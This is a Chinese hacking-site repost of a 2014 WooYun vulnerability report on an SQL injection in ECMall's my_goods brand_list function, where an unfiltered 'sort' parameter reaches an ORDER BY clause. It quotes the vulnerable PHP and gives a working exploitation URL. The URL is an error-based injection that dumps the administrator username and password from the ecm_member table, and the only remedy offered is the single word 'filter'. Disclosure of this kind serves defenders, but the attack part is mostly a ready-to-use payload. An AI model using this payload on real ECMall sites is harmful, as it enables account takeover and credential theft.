记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Ecmall某处SQL注射漏洞

2014-05-28 17:40

缺陷文件:/app/my_goods.app.php

function brand_list()

{

if (!empty($_GET['brand_name']) || !empty($_GET['store']))

{

$_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'";

$_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id;

}

if (isset($_GET['sort']) && isset($_GET['order']))

{

$sort = strtolower(trim($_GET['sort'])); //未过滤

$order = strtolower(trim($_GET['order']));

if (!in_array($order,array('asc','desc')))

{

$sort = 'store_id';

$order = 'desc';

}

}

else

{

$sort = 'store_id';

$order = 'desc';

}

$page = $this->_get_page(10);

$conditions = $this->_get_query_conditions($con);

$brand = $this->_brand_mod->find(array( //跟踪

'conditions' => "(1=1 $conditions)" . $filtered,

'limit' => $page['limit'],

'order' => "$sort $order",//here

'count' => true,

));



function find($params = array())

{

extract($this->_initFindParams($params));



/* 字段(SELECT FROM) */

$fields = $this->getRealFields($fields);

$fields == '' && $fields = '*';



$tables = $this->table . ' ' . $this->alias;



/* 左联结(LEFT JOIN) */

$join_result = $this->_joinModel($tables, $join);



/* 原来为($join_result || $index_key),忘了最初的用意,默认加上主键应该是只为了为获得索引的数组服务的,因此只跟索引键是否是主键有关 */

if ($index_key == $this->prikey || (is_array($index_key) && in_array($this->prikey, $index_key)))

{

/* 如果索引键里有主键,则默认在要查询字段后加上主键 */

$fields .= ",{$this->alias}.{$this->prikey}";

}



/* 条件(WHERE) */

$conditions = $this->_getConditions($conditions, true);



/* 排序(ORDER BY) */

$order && $order = ' ORDER BY ' . $this->getRealFields($order);//跟踪

……



function getRealFields($src_fields_list)

{

$fields = $src_fields_list;

if (!$src_fields_list)

{

$fields = '';

}

$fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', "\$this->_getFieldTable('\\1') . '.\\2'", $fields);//对注射语句没有影响



return $fields;

}



function _getFieldTable($owner)

{

if ($owner == 'this')

{

return $this->alias;

}

else

{

$m =& m($owner);

if ($m === false)

{

/* 若没有对象,则原样返回 */

return $owner;

}



return $m->alias;

}

}





存在注射

漏洞证明:

aa.png

利用方法:

注册会员开一个店铺

访问:index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23



即可爆出用户名密码



修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-052124

阅读:52097 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“Ecmall某处SQL注射漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云